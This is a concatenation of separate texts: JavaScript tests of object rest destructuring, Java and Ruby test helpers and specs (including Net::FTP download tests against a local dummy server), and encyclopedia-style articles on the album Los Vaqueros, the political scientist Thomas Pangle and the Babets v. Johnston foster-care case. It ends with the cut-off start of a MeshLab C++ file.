//your_sha256_hash---------------------------------------
//your_sha256_hash---------------------------------------
// Object Rest unit tests
if (this.WScript && this.WScript.LoadScriptFile) { // Check for running in ch
this.WScript.LoadScriptFile("..\\UnitTestFramework\\UnitTestFramework.js");
}
var tests = [
{
name: "let assignment with simple Object",
body: function() {
let {a, b, ...rest} = {a: 1, b: 2, c: 3, d: 4};
assert.areEqual(1, a);
assert.areEqual(2, b);
assert.areEqual({c: 3, d: 4}, rest);
}
},
{
name: "var assignment with simple Object",
body: function() {
var {a, b, ...rest} = {a: 1, b: 2, c: 3, d: 4};
assert.areEqual(1, a);
assert.areEqual(2, b);
assert.areEqual({c: 3, d: 4}, rest);
}
},
{
name: "Rest in assignment expression",
body: function() {
({a, b, ...rest} = {a: 1, b: 2, c: 3, d: 4});
assert.areEqual(1, a);
assert.areEqual(2, b);
assert.areEqual({c: 3, d: 4}, rest);
}
},
{
name: "Rest with simple function parameter Object",
body: function() {
function foo({a: _a, b: _b, ..._rest}) {
assert.areEqual(1, _a);
assert.areEqual(2, _b);
assert.areEqual({c: 3, d: 4}, _rest);
}
foo({a: 1, b: 2, c: 3, d: 4});
}
},
{
name: "Rest with simple catch parameter Object",
body: function() {
try {
throw {a: 1, b: 2, c: 3, d: 4};
} catch({a: _a, b: _b, ..._rest}) {
assert.areEqual(1, _a);
assert.areEqual(2, _b);
assert.areEqual({c: 3, d: 4}, _rest);
}
}
},
{
name: "Rest with simple for variable declaration",
body: function() {
bar = [{a: 1, b: 2, c: 3, d: 4}];
for({a, b, ...rest} of bar) {
assert.areEqual(1, a);
assert.areEqual(2, b);
assert.areEqual({c: 3, d: 4}, rest);
}
}
},
{
name: "Rest nested in destructuring",
body: function() {
let {a, b, double: {c, ...rest}} = {a: 1, b: 2, double: {c: 3, d: 4}};
assert.areEqual(1, a);
assert.areEqual(2, b);
assert.areEqual(3, c);
assert.areEqual({d: 4}, rest);
}
},
{
name: "Rest with nested function parameter Object",
body: function() {
function foo({a: _a, b: _b, double: {c: _c, ..._rest}}) {
assert.areEqual(1, _a);
assert.areEqual(2, _b);
assert.areEqual(3, _c);
assert.areEqual({d: 4}, _rest);
}
foo({a: 1, b: 2, double: {c: 3, d: 4}});
}
},
{
name: "Rest with computed properties",
body: function() {
let {a, ["b"]:b, ...rest} = {a: 1, b: 2, c: 3, d: 4};
assert.areEqual(1, a);
assert.areEqual(2, b);
assert.areEqual({c: 3, d: 4}, rest);
}
},
{
name: "Rest with computed properties in function parameter binding",
body: function() {
function foo({a: _a, ["b"]: _b, ..._rest}) {
assert.areEqual(1, _a);
assert.areEqual(2, _b);
assert.areEqual({c: 3, d: 4}, _rest);
}
foo({a: 1, b: 2, c: 3, d: 4});
}
},
{
name: "Rest inside re-entrant function",
body: function() {
function foo(r) {
if (r) {
var {a, [foo(false)]:b, ...rest} = {a: 1, b: 2, c: 3, d: 4};
assert.areEqual(1, a);
assert.areEqual(2, b);
assert.areEqual({c: 3, d: 4}, rest);
} else {
var {one, ...rest} = {one:1, two:2, three:3};
assert.areEqual(1, one);
assert.areEqual({two: 2, three: 3}, rest);
}
return "b";
}
foo(true);
}
},
{
name: "Rest nested in Computed Value",
body: function() {
let {[eval("let {..._rest} = {a: 1, b: 2, c: 3, d: 4};\"a\"")]:nest, ...rest} = {a: 10, b: 20, c: 30, d: 40};
assert.areEqual(10, nest);
assert.areEqual({b: 20, c: 30, d: 40}, rest);
}
},
{
name: "Rest with no values left to destructure",
body: function() {
let {a, b, ...rest} = {a: 1, b: 2};
assert.areEqual(1, a);
assert.areEqual(2, b);
assert.areEqual({}, rest);
}
},
{
name: "Getters in rhs object should be evaluated",
body: function() {
let getterExecuted = false;
let obj = {a: 1, get b() {getterExecuted = true; return 2;}};
let {...rest} = obj;
assert.areEqual(1, rest.a);
assert.isTrue(getterExecuted);
assert.areEqual(2, rest.b);
}
},
{
name: "Rest modifying source object",
body: function() {
let val = 1;
let source = {get a() {val++; return 1;}, get b() {return val;}};
let {b, ...rest} = source;
assert.areEqual(1, b);
assert.areEqual(1, rest.a);
}
},
{
name: "Source object changed by destructuring before Rest",
body: function() {
let val = 1;
let source = {get a() {val++; return 1;}, get b() {return val;}};
let {a, ...rest} = source;
assert.areEqual(1, a);
assert.areEqual(2, rest.b);
}
},
{
name: "Copy only own properties",
body: function() {
let parent = {i: 1, j: 2};
let child = Object.create(parent);
child.i = 3;
let {...rest} = child;
assert.areEqual(3, child.i);
assert.areEqual(2, child.j);
assert.areEqual(3, rest.i);
assert.isFalse(rest.hasOwnProperty("j"));
}
},
{
name: "Rest includes symbols in properties",
body: function() {
let sym = Symbol("foo");
let a = {};
a[sym] = 1;
let {...rest} = a;
assert.areEqual(1, rest[sym], "property with Symbol property name identifier should be copied over");
assert.areEqual(1, Object.getOwnPropertySymbols(rest).length);
}
},
{
name: "Object Rest interacting with Arrays",
body: function() {
let arr = [1, 2, 3];
let {[2]:foo, ...rest} = arr;
assert.areEqual(2, Object.keys(rest).length);
assert.areEqual(1, rest[0]);
assert.areEqual(2, rest[1]);
assert.areEqual(3, foo);
}
},
// TODO: Fix bug regarding nested destrucuring in array rest.
// Disabling this test for now
// {
// name: "Object Rest interacting with Array Rest",
// body: function() {
// function foo(a, ...{...rest}) {
// assert.areEqual(1, a);
// assert.areEqual(2, rest[0]);
// assert.areEqual(3, rest[1]);
// assert.areEqual(2, Object.keys(rest).length);
// }
// foo(1, 2, 3);
// }
// },
{
name: "Object Rest interacting with Numbers",
body: function() {
let {...rest} = 1;
assert.areEqual(0, Object.keys(rest).length);
}
},
{
name: "Object Rest interacting with Functions",
body: function() {
let {...rest} = function i() {return 1;}
assert.areEqual(0, Object.keys(rest).length);
}
},
{
name: "Object Rest interacting with Strings",
body: function() {
let {...rest} = "edge";
assert.areEqual(4, Object.keys(rest).length);
assert.areEqual("e", rest[0]);
assert.areEqual("d", rest[1]);
assert.areEqual("g", rest[2]);
assert.areEqual("e", rest[3]);
}
},
{
name: "Test Proxy Object",
body: function() {
let proxy = new Proxy({i: 1, j: 2}, {});
let {...rest} = proxy;
assert.areEqual(2, Object.keys(rest).length);
assert.areEqual(1, rest.i);
assert.areEqual(2, rest.j);
}
},
{
name: "Test Proxy Object with custom getter",
body: function() {
let handler = {get: function(obj, prop) {return obj[prop];}};
let proxy = new Proxy({i: 1, j: 2}, handler);
let {...rest} = proxy;
assert.areEqual(2, Object.keys(rest).length);
assert.areEqual(1, rest.i);
assert.areEqual(2, rest.j);
}
},
{
name: "Test Proxy Object with custom getter and setter",
body: function() {
let setterCalled = false;
let handler = {
get: function(obj, prop) {
return obj[prop];
},
set: function(obj, prop, value) {
setterCalled = true;
}
};
let proxy = new Proxy({i: 1, j: 2}, handler);
let {...rest} = proxy;
assert.areEqual(2, Object.keys(rest).length);
assert.areEqual(1, rest.i);
assert.areEqual(2, rest.j);
assert.isFalse(setterCalled);
}
},
{
name: "Test Syntax Errors",
body: function() {
assert.throws(function () { eval("let {...rest1, ...rest2} = {a:1, b:2};"); }, SyntaxError, "Destructuring assignment can only have 1 Rest", "Destructuring rest variables must be in the last position of the expression");
assert.throws(function () { eval("let {...{a, b}} = {a:1, b:2};"); }, SyntaxError, "Destructuring inside Rest is invalid syntax", "Expected identifier");
assert.throws(function () { eval("let {...{a, ...rest}} = {a:1, b:2};"); }, SyntaxError, "Nested Rest is invalid syntax", "Expected identifier");
assert.throws(function () { eval("let {...rest, a} = {a:1, b:2};"); }, SyntaxError, "Rest before other variables is invalid syntax", "Destructuring rest variables must be in the last position of the expression");
assert.throws(function () { eval("...(rest)"); }, SyntaxError, "Rest must be inside destructuring", "Invalid use of the ... operator. Spread can only be used in call arguments or an array literal.");
assert.throws(function () { eval("let {...(rest)} = {a:1, b:2};"); }, SyntaxError, "Destructuring expressions can only have identifier references");
assert.throws(function () { eval("let {...++rest} = {a: 1, b: 2};"); }, SyntaxError, "Prefix operators before rest is invalid syntax", "Unexpected operator in destructuring expression");
assert.throws(function () { eval("let {...rest++} = {a: 1, b: 2};"); }, SyntaxError, "Postfix operators after rest is invalid syntax", "Unexpected operator in destructuring expression");
assert.throws(function () { eval("let {...rest+1} = {a: 1, b: 2};"); }, SyntaxError, "Infix operators after rest is invalid syntax", "Unexpected operator in destructuring expression");
assert.throws(function () { eval("let {... ...rest} = {};"); }, SyntaxError, "Incomplete rest expression", "Unexpected operator in destructuring expression");
assert.throws(function () { eval("let {...} = {};"); }, SyntaxError, "Incomplete rest expression", "Destructuring expressions can only have identifier references");
assert.throws(function () { eval("function foo({...rest={}}){};"); }, SyntaxError, "Rest cannot be default initialized", "Unexpected default initializer");
}
},
{
name: "Test Type Errors",
body: function() {
assert.throws(function () { eval("let {...rest} = undefined;"); }, TypeError, "Cannot destructure undefined", "Cannot convert null or undefined to object");
assert.throws(function () { eval("let {...rest} = null;"); }, TypeError, "Cannot destructure null", "Cannot convert null or undefined to object");
}
},
];
testRunner.runTests(tests, { verbose: WScript.Arguments[0] != "summary" });
```
|
Los Vaqueros (English: The Cowboys) is a collaboration album by Wisin & Yandel featuring the artists from their record label WY Records. It was nominated for a Lo Nuestro Award for Urban Album of the Year.
Content
It features the following artists: Wisin & Yandel, Gadiel, Franco "El Gorila", Yomille Omar "El Tio", Tony Dize with guest appearances by Don Omar, Gallego and Héctor el Father. This album is the "baby" of Wisin & Yandel's recently emerged WY Records, for being the first production by the record label. Besides participating in the vocals, Herson Cifuentes was as well active in the production and development of Los Vaqueros. The Puerto Rican duo, as founders of WY Records, introduced Franco "El Gorilla", Gadiel, and El Tío to the genre for the first time with a more broad promotion by featuring them in several songs on this album. Not too long after the release of Los Vaqueros, a Collector's Edition was released by the company, which included the original CD but with four extra songs plus an extra DVD with two music video clips, an interview, and a photo shot session video.
Track listing
Wild Wild Mixes
Los Vaqueros: Wild Wild Mixes is a remix album of Los Vaqueros released on July 24, 2007.
Charts
Certifications
See also
List of number-one Billboard Latin Rhythm Albums of 2007
References
2006 albums
Wisin & Yandel albums
Machete Music albums
|
```java
/*
* one or more contributor license agreements. See the NOTICE file distributed
* with this work for additional information regarding copyright ownership.
*/
package io.camunda.zeebe.test.util.record;
import io.camunda.zeebe.protocol.record.Record;
import io.camunda.zeebe.protocol.record.value.DecisionEvaluationRecordValue;
import java.util.stream.Stream;
public final class DecisionEvaluationRecordStream
extends ExporterRecordStream<DecisionEvaluationRecordValue, DecisionEvaluationRecordStream> {
public DecisionEvaluationRecordStream(
final Stream<Record<DecisionEvaluationRecordValue>> wrappedStream) {
super(wrappedStream);
}
@Override
protected DecisionEvaluationRecordStream supply(
final Stream<Record<DecisionEvaluationRecordValue>> wrappedStream) {
return new DecisionEvaluationRecordStream(wrappedStream);
}
public DecisionEvaluationRecordStream withProcessInstanceKey(final long processInstanceKey) {
return valueFilter(v -> v.getProcessInstanceKey() == processInstanceKey);
}
public DecisionEvaluationRecordStream withElementInstanceKey(final long elementInstanceKey) {
return valueFilter(v -> v.getElementInstanceKey() == elementInstanceKey);
}
public DecisionEvaluationRecordStream withElementId(final String elementId) {
return valueFilter(v -> v.getElementId().equals(elementId));
}
public DecisionEvaluationRecordStream withDecisionKey(final long decisionKey) {
return valueFilter(v -> v.getDecisionKey() == decisionKey);
}
public DecisionEvaluationRecordStream withDecisionId(final String decisionId) {
return valueFilter(v -> v.getDecisionId().equals(decisionId));
}
public DecisionEvaluationRecordStream withDecisionName(final String decisionName) {
return valueFilter(v -> v.getDecisionName().equals(decisionName));
}
public DecisionEvaluationRecordStream withTenantId(final String tenantId) {
return valueFilter(v -> tenantId.equals(v.getTenantId()));
}
}
```
|
```ruby
describe :net_ftp_getbinaryfile, shared: true do
before :each do
@fixture_file = __dir__ + "/../fixtures/getbinaryfile"
@tmp_file = tmp("getbinaryfile")
@server = NetFTPSpecs::DummyFTP.new
@server.serve_once
@ftp = Net::FTP.new
@ftp.connect(@server.hostname, @server.server_port)
@ftp.binary = @binary_mode
end
after :each do
@ftp.quit rescue nil
@ftp.close
@server.stop
rm_r @tmp_file
end
it "sends the RETR command to the server" do
@ftp.send(@method, "test", @tmp_file)
@ftp.last_response.should == "226 Closing data connection. (RETR test)\n"
end
it "returns nil" do
@ftp.send(@method, "test", @tmp_file).should be_nil
end
it "saves the contents of the passed remote file to the passed local file" do
@ftp.send(@method, "test", @tmp_file)
File.read(@tmp_file).should == "This is the content\nof the file named 'test'.\n"
end
describe "when passed a block" do
it "yields the received content as binary blocks of the passed size" do
res = []
@ftp.send(@method, "test", @tmp_file, 10) { |bin| res << bin }
res.should == [ "This is th", "e content\n", "of the fil", "e named 't", "est'.\n" ]
end
end
describe "when resuming an existing file" do
before :each do
@tmp_file = tmp("getbinaryfile_resume")
File.open(@tmp_file, "wb") do |f|
f << "This is the content\n"
end
@ftp.resume = true
end
it "saves the remaining content of the passed remote file to the passed local file" do
@ftp.send(@method, "test", @tmp_file)
File.read(@tmp_file).should == "This is the content\nof the file named 'test'.\n"
end
describe "and the REST command fails" do
it "raises a Net::FTPProtoError when the response code is 550" do
@server.should_receive(:rest).and_respond("Requested action not taken.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPProtoError)
end
it "raises a Net::FTPPermError when the response code is 500" do
@server.should_receive(:rest).and_respond("500 Syntax error, command unrecognized.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPPermError)
end
it "raises a Net::FTPPermError when the response code is 501" do
@server.should_receive(:rest).and_respond("501 Syntax error, command unrecognized.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPPermError)
end
it "raises a Net::FTPPermError when the response code is 502" do
@server.should_receive(:rest).and_respond("502 Command not implemented.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPPermError)
end
it "raises a Net::FTPTempError when the response code is 421" do
@server.should_receive(:rest).and_respond("421 Service not available, closing control connection.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPTempError)
end
it "raises a Net::FTPPermError when the response code is 530" do
@server.should_receive(:rest).and_respond("530 Not logged in.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPPermError)
end
end
end
describe "when the RETR command fails" do
it "raises a Net::FTPTempError when the response code is 450" do
@server.should_receive(:retr).and_respond("450 Requested file action not taken.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPTempError)
end
it "raises a Net::FTPProtoError when the response code is 550" do
@server.should_receive(:retr).and_respond("Requested action not taken.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPProtoError)
end
it "raises a Net::FTPPermError when the response code is 500" do
@server.should_receive(:retr).and_respond("500 Syntax error, command unrecognized.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPPermError)
end
it "raises a Net::FTPPermError when the response code is 501" do
@server.should_receive(:retr).and_respond("501 Syntax error, command unrecognized.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPPermError)
end
it "raises a Net::FTPTempError when the response code is 421" do
@server.should_receive(:retr).and_respond("421 Service not available, closing control connection.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPTempError)
end
it "raises a Net::FTPPermError when the response code is 530" do
@server.should_receive(:retr).and_respond("530 Not logged in.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPPermError)
end
end
describe "when opening the data port fails" do
it "raises a Net::FTPPermError when the response code is 500" do
@server.should_receive(:eprt).and_respond("500 Syntax error, command unrecognized.")
@server.should_receive(:port).and_respond("500 Syntax error, command unrecognized.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPPermError)
end
it "raises a Net::FTPPermError when the response code is 501" do
@server.should_receive(:eprt).and_respond("501 Syntax error in parameters or arguments.")
@server.should_receive(:port).and_respond("501 Syntax error in parameters or arguments.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPPermError)
end
it "raises a Net::FTPTempError when the response code is 421" do
@server.should_receive(:eprt).and_respond("421 Service not available, closing control connection.")
@server.should_receive(:port).and_respond("421 Service not available, closing control connection.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPTempError)
end
it "raises a Net::FTPPermError when the response code is 530" do
@server.should_receive(:eprt).and_respond("530 Not logged in.")
@server.should_receive(:port).and_respond("530 Not logged in.")
-> { @ftp.send(@method, "test", @tmp_file) }.should raise_error(Net::FTPPermError)
end
end
end
```
|
Thomas Lee Pangle, (born 1944) is an American political scientist. He holds the Joe R. Long Chair in Democratic Studies in the Department of Government and is Co-Director of the Thomas Jefferson Center for Core Texts and Ideas at the University of Texas at Austin. He has also taught at the University of Toronto and Yale University. He was a student of Leo Strauss.
Education and career
Pangle was born and grew up in Gouverneur, New York. He graduated from Cornell University with a Bachelor of Arts degree in 1966, "with distinction in all subjects" and ranked fifth in class, having studied political philosophy under Allan Bloom. Pangle received his Ph.D. in political science in 1972 from University of Chicago. His dissertation was "Montesquieu and the Moral Basis of Liberal Democracy," completed under the supervision of Joseph Cropsey, Herbert Storing, and Richard E. Flathman.
From 1971 to 1979 he taught at Yale University, first as a lecturer and then as an assistant professor and associate professor. In 1979 he was appointed to Graduate School at the University of Toronto as an Associate Professor and was awarded tenure. He became a professor in 1983 and was named University Professor in 2001. During his tenure at the University of Toronto Pangle was first a fellow at Victoria College from 1979 to 1984 and then at St. Michael's College from 1985 to 2004. Pangle left the University of Toronto after 25 years to accept the position of Joe R. Long Chair in Democratic Studies in the Department of Government at the University of Texas at Austin, citing concerns about mandatory retirement.
Pangle was a visiting professor at the University of Chicago in 1984 and at the École des Hautes Études en Sciences Sociales in 1987.
Pangle is married to fellow professor Lorraine Smith Pangle, who was also a faculty member at the University of Toronto and is a professor in the Department of Government at the University of Texas.
Academic interests
Pangle's writings on ancient political philosophy attempt to show how Socratic arguments for the supremacy of the philosophic life shape, enrich, and ground the classical republican teaching on civic and moral virtue and on the spiritual goals of self-government. His studies of medieval and biblical political thought seek to revive the mutually challenging dialogue between the competing Socratic and scriptural notions of wisdom and of the cultivation of wisdom in civic life.
His interpretations of the thought of the American Founding, and of its philosophic foundations in Locke and Montesquieu, prepares the ground for his exposition of Nietzsche as the most radical critic of modern rationalism. These studies argue for the significance, within modernity, of a continued if eclipsed commitment to the life of understanding pursued for its own sake. At the same time, Pangle diagnoses the costs and the benefits—for civic virtue as well as for the life of the mind—of the diminished public or civic status of the moral and intellectual virtues in modern republicanism.
Pangle is a Fellow of the Royal Society of Canada, and has won Guggenheim, Killam-Canada Council, Carl Friedrich von Siemens, and four National Endowment for the Humanities fellowships. He has been awarded The Benton Bowl at Yale University (for contribution to education in politics) and the Robert Foster Cherry Great Teacher of the World Prize, Baylor University. In 2007 he delivered, at the invitation of the Bavarian Academy of Sciences, the Werner Heisenberg Lecture. A Festschrift in his honor was published as: Recovering Reason: Essays in Honor of Thomas L. Pangle. Edited by Timothy Burns. Lexington Books, 2010.
Pangle's conception of philosophy
Inspired and guided by Leo Strauss's revival of Platonic political philosophy, Pangle's work has as its unifying aim the clarification and defense of the original Socratic conception of political philosophy. In the manner that Pangle understands it, the Socratic conception is controversial.
What the Socratic conception of political theory amounts to, Pangle contends, is a lifelong vindication, through conversational refutations that purify common sense notions of justice and nobility, of self-knowledge and of inquiry into the nature of things as the highest and supremely fulfilling dimension of human existence. This notion of the true human good, as the good that makes all relativistic and egalitarian outlooks appear impoverished, obviously contradicts or directly clashes with what most people today are told and believe is the life they ought to lead. Pangle asserts that the awakened philosophic life is the only truly human life.
Yale tenure controversy
Pangle was denied tenure at Yale University, in a scandal, during which a senior colleague explained, in a pronouncement (which became the theme of a protest panel at the annual convention of the American Political Science Association): "academic freedom is one thing, but there are two types who will never be permitted tenure at Yale: Leninists and Straussians." The Wall Street Journal ("Dry Rot at College," Editorial Aug. 31, 1979, p. 6), Commentary ("God and Man at Yale—Again," by Robert Kagan, February, 1982; Letters exchange, August, 1982) and other journals (The New York Review of Books, May 12, 1983, pp. 56–57, "Saving the Free World: An Exchange," statement by Eugene Genovese; Yale Political Monthly, Dec. 1979, pp. 2–11, "Academic Freedom at Yale: the Pangle Case"), published editorials, columns, and articles attacking Yale's denial of academic freedom. Yale or its spokespersons denied the imputations. Yale set up a judiciary panel, led by the historian Edmund Morgan, to hear the case—amid campus-wide protests and marches on Pangle's behalf (Yale Daily News, Sept. 10, 1979, p. 1, "2,300 Students Protest Tenure Policy"); the panel decided in Pangle's favor and rescinded the decision denying tenure by the Department of Political Science, on the basis of testimony from graduate students about what Political Science faculty had declared in public about the grounds on which Pangle was being denied tenure. Yale instituted a new procedure that took the decision out of the hands of the department and lodged it in a board, specially designed for Pangle's tenure review, that was composed of five scholars, two not from Yale (led by Peter Gay): Yale University News Release, Monday afternoon, Oct. 15, 1979; Yale Weekly Bulletin and Calendar, Oct. 22–29, 1979, p. 1; Yale Daily News, Extra Edition, Oct. 16, 1979, "Pangle Wins New Tenure Review: Original Decision Overruled; Professor says he is 'gratified'". At that point, Pangle resigned, having been offered a tenured position at the University of Toronto (see entries on C. B. Macpherson and Allan Bloom)—and because, as he declared, he no longer felt he could comfortably live with his colleagues in the Yale Political Science Department.
Noted lectures
Speaker at the National Endowment for the Humanities Inaugural Colloquium on the Bicentennial of the Constitution, Wake Forest University, 1984.
Exxon Distinguished Lectures in Humane Approaches to the Social Sciences, at the University of Chicago, 1987.
Thomas J. White Lecture, at Notre Dame, 1988.
The Plenary Address, Association of American Law Schools Annual Meeting, 1989.
Feaver MacMinn Visiting Scholar at the University of Oklahoma, 1990.
The Ronald J. Fiscus Lecture, Skidmore College (2001).
Werner Heisenberg Memorial Lecture at the Carl Friedrich von Siemens Foundation, Bavarian Academy of Sciences, Munich, Germany, 2007.
Herbert W. Vaughan Lecture on America's Founding Principles, Princeton University, 2007.
On Liberal Education at the Jack Miller Center, 2011.
Bibliography
Montesquieu's Philosophy of Liberalism: A Commentary on The Spirit of the Laws . University of Chicago Press, 1973. —Chinese translation (Shanghai: Huaxia, Hermes, Classici et Commentarii, East China Normal University Press, 2017).
The Laws of Plato: translated with notes and an interpretive essay by Thomas L. Pangle. Basic Books, 1980. —Chinese translation (by Ying Zhu) of interpretive essay (Shanghai: Huaxia, Hermes, Classici et Commentarii, East China Normal University Press, 2012).
The Roots of Political Philosophy: Ten Forgotten Socratic Dialogues, translated, with interpretive studies. (Editor) Cornell University Press, 1987. —Chinese translation forthcoming: Beijing, The Commercial Press (Bardon-Chinese Media Agency).
The Spirit of Modern Republicanism: The Moral Vision of the American Founders and the Philosophy of Locke. University of Chicago Press, 1988. —Chinese translation forthcoming from East China Normal University Press, with new author's Preface.
The Rebirth of Classical Political Rationalism: An Introduction to the Thought of Leo Strauss: Essays and Lectures by Leo Strauss, selected and introduced by T. L. Pangle. University of Chicago Press, 1989. —French translation, Editions Gallimard, Bibliothèque de Philosophie 1993. Japanese translation, The English Agency Ltd., 1998. Chinese translation, Shanghai: Huaxia, Hermes, Classici et Commentarii, 2009 and revised 2011.
The Ennobling of Democracy: The Challenge of the Postmodern Age. Johns Hopkins University Press, 1992. —Uszlachetnianie demokracji: Wyzwanie epoki postmodernistycznej (Krakow: Wydawnictwo Znak, Library of Political Thought of the Center for Political Thought, 1994), 318 pages. (Polish translation by Marek Klimowicz.)—Chinese translation forthcoming from East China Normal University Press, with new author's Preface.
The Learning of Liberty: The Educational Ideas of the American Founders (with Lorraine Smith Pangle). University Press of Kansas, 1993
Political Philosophy and the Human Soul: Essays in Memory of Allan Bloom. Rowman & Littlefield Publishers, 1995. Co-editor with Michael Palmer, and author of “The Hebrew Bible’s Challenge to Political Philosophy: Some Introductory Reflections,” 67–82.—Chinese translation of essay, in Classici et Commentarii 39: Laws and Political Philosophy, ed. Lei Peng (Shanghai: Huaxia, Hermes, Classici et Commentarii, 2013), pp. 2–21.
Justice Among Nations: On the Moral Basis of Power and Peace, (with Peter J. Ahrensdorf). U. Press of Kansas, 1999.
Political Philosophy and the God of Abraham. Johns Hopkins University Press, 2003.
Leo Strauss: An Introduction to His Thought and Intellectual Legacy. Johns Hopkins U. Press, 2006
The Great Debate: Advocates and Opponents of the American Constitution. The Teaching Company, 2007.
The Theological Basis of Liberal Modernity in Montesquieu's "Spirit of the Laws". University of Chicago Press, 2010.
Political Philosophy Cross-Examined: Perennial Challenges to the Philosophic Life (Palgrave-Macmillan, 2013). Co-editor with J. Harvey Lomax, and author of “Aristotle’s Politics Book 7 On the Best Way of Life.”
Birds, Peace, Wealth: Aristophanes’ Critique of the Gods. Ed. and Trans. with Wayne Ambler. Paul Dry Books, 2013.
Political Philosophy Cross-Examined: Perennial Challenges to the Philosophic Life. Ed. with J. Harvey Lomax. Palgrave-Macmillan, 2013.
Sophocles: The Theban Plays. Oedipus the Tyrant, Oedipus at Colonus, Antigone. Translated with Introductions. With Peter J. Ahrensdorf. Cornell University Press, 2013.
Aristotle’s Teaching in the POLITICS. University of Chicago Press, 2013. —Chinese translation, Shanghai: Huaxia, Hermes, Classici et Commentarii, East China Normal University Press, 2017.
"On Heisenberg’s Key Statement Concerning Ontology," Review of Metaphysics 67 (June 2014), 835-59.
The Key Texts of Political Philosophy: An Introduction, co-authored with Timothy Burns (Cambridge: Cambridge U. Press, 2014). —Chinese translation forthcoming from Beijing United Publishing Co.
The Socratic Way of Life: Xenophon's MEMORABILIA (Chicago: U. of Chicago Press, 2018).
The Socratic Founding of Political Philosophy: Xenophon's ECONOMIST, SYMPOSIUM, AND APOLOGY (Chicago: U. of Chicago Press, 2020).
See also
American philosophy
List of American philosophers
Notes
1944 births
Living people
People from Gouverneur, New York
Cornell University alumni
University of Chicago alumni
American Episcopalians
American political philosophers
Historians of political thought
20th-century American philosophers
21st-century American philosophers
Academic staff of the University of Toronto
University of Texas at Austin faculty
Fellows of the Royal Society of Canada
Political scientists who studied under Leo Strauss
Historians from New York (state)
|
Babets v. Johnston was a landmark Massachusetts Supreme Judicial Court case that affirmed the rights of same-sex couples to adopt children.
Background
Don Babets and David Jean were a gay couple living together in Massachusetts. In 1984 the pair applied with the state Department of Social Services to become foster parents. The state began a lengthy evaluation process, including a detailed background check, conversations with their friends and colleagues, and consultation with the pair's priest. The placement was approved in April 1985 and Babets and Jean became foster parents to two children, who were brothers. The placement was approved by both the state and the children's biological mother. On May 8, 1985, The Boston Globe ran an article alleging community opposition to the two becoming foster parents. One day later, on May 9, the state removed the children from their household.
Massachusetts Governor Michael Dukakis initiated a policy review to determine whether gay couples should be allowed to be foster parents while Philip Johnston, the head of human services, started his own review. The policy reviews resulted in the state adopting a slate of new rules relating to foster parenting, including that children only be placed in "traditional family settings," that potential foster parents disclose their sexuality to the state, and that existing gay foster parents subject themselves to a biannual review process. Babets and Jean, represented by the ACLU and GLAD, filed suit against the state. They were joined in the lawsuit by two other foster parents and the National Association of Social Workers. The lawsuit challenged the new regulations, alleging that the updated rules violated the rights to equal protection and due process.
Proceedings
As the case developed, the state of Massachusetts refused to provide documents describing the lead-up to the policy's adoption, claiming that they were protected by "executive privilege." In 1988, the Supreme Judicial Court ruled that no such protection existed under state law and ordered the state to supply any such documents. The documents revealed that Dukakis had personally directed the state human services department to prevent gay couples from fostering and that he had cited political concerns as the primary motivation.In 1990 the state settled, agreeing to return to a "best interests of the child" standard and to remove any requirements relating to sexuality.
Legacy
Despite the state eventually settling, the children were never returned to Babets and Jean. In 1995, the couple adopted four children and received a note of congratulations from the Massachusetts General Court, which had voted to ban gay foster parents in 1985.
Michael Dukakis' role in the lawsuit attracted criticism from both the Democratic Party and LGBTQ organizations. During the 1988 Democratic Party presidential primaries, protestors were a regular sight at Dukakis' campaign rallies.
References
American Civil Liberties Union litigation
Massachusetts Supreme Judicial Court cases
United States LGBT rights case law
1988 in United States case law
|
```ruby
# frozen_string_literal: true
require "spec_helper"
module Decidim
module Sortitions
module Admin
describe UpdateSortition do
let(:additional_info) { Decidim::Faker::Localized.wrapped("<p>", "</p>") { Decidim::Faker::Localized.sentence(word_count: 4) }.except("machine_translations") }
let(:title) { Decidim::Faker::Localized.sentence(word_count: 3).except(:machine_translations) }
let(:sortition) { create(:sortition) }
let(:user) { create(:user, :admin, :confirmed) }
let(:params) do
{
id: sortition.id,
sortition: {
title:,
additional_info:
}
}
end
let(:context) do
{
current_user: user,
current_component: sortition.component
}
end
let(:form) { EditSortitionForm.from_params(params).with_context(context) }
let(:command) { described_class.new(form) }
describe "when the form is not valid" do
before do
allow(form).to receive(:invalid?).and_return(true)
end
it "broadcasts invalid" do
expect { command.call }.to broadcast(:invalid)
end
end
describe "when the form is valid" do
before do
allow(form).to receive(:invalid?).and_return(false)
end
it "broadcasts ok" do
expect { command.call }.to broadcast(:ok)
end
it "Updates the title" do
command.call
sortition.reload
expect(sortition.title.except("machine_translations")).to eq(title)
end
it "Updates the additional info" do
command.call
sortition.reload
expect(sortition.additional_info.except("machine_translations")).to eq(additional_info)
end
it "traces the action", versioning: true do
expect(Decidim.traceability)
.to receive(:update!)
.with(sortition, user, kind_of(Hash))
.and_call_original
expect { command.call }.to change(Decidim::ActionLog, :count)
action_log = Decidim::ActionLog.last
expect(action_log.version).to be_present
end
end
end
end
end
end
```
|
```c++
/****************************************************************************
* MeshLab o o *
* A versatile mesh processing toolbox o o *
* _ O _ *
* Visual Computing Lab /\/| *
* ISTI - Italian National Research Council | *
* \ *
* All rights reserved. *
* *
* This program is free software; you can redistribute it and/or modify *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* for more details. *
* *
****************************************************************************/
#include "edit_point_factory.h"
#include "edit_point.h"
PointEditFactory::PointEditFactory()
{
